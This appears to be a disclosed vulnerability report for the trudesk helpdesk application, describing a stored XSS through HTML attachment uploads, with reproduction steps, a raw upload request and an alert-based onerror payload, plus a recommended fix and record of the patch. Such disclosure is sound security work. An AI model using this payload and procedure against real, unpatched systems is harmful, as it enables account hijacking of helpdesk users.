Least Privilege Violation in polonel/trudesk


Reported on

Jun 15th 2021


Stored XSS via file upload


The stored XSS allows arbitrary JavaScript to be executed in the victim's trudesk account. An external user can also trigger the XSS in an admin account, as shown here.


1. First, as admin, go to http://localhost:8118/teams and create a team called team2.
Now go to http://localhost:8118/accounts/agents and add a new user called user B with the support role, and assign him to team2.

2. Now, as an external user, go to http://localhost:8118/newissue and create a new ticket.

3. Now user B goes to his account, where he can see the public ticket created above.
User B can upload an attachment to this ticket.
User B can attach any file, including an HTML file, and an HTML file can execute JavaScript.
When an HTML file is uploaded, the request below is sent to the server:

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

Content-Disposition: form-data; name="ticketId"

Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>

After uploading, a user can access the uploaded file using a URL like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html.
If any user opens this file, the XSS is executed.


When serving uploaded files, don't render them. You can use the Content-Disposition: attachment; filename="filename.html" header to prevent an HTML file from being rendered; the browser will then ask the user to download the file instead.


Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
Chris Brame confirmed that a fix has been merged on 25c5ae a year ago
Chris Brame has been awarded the fix bounty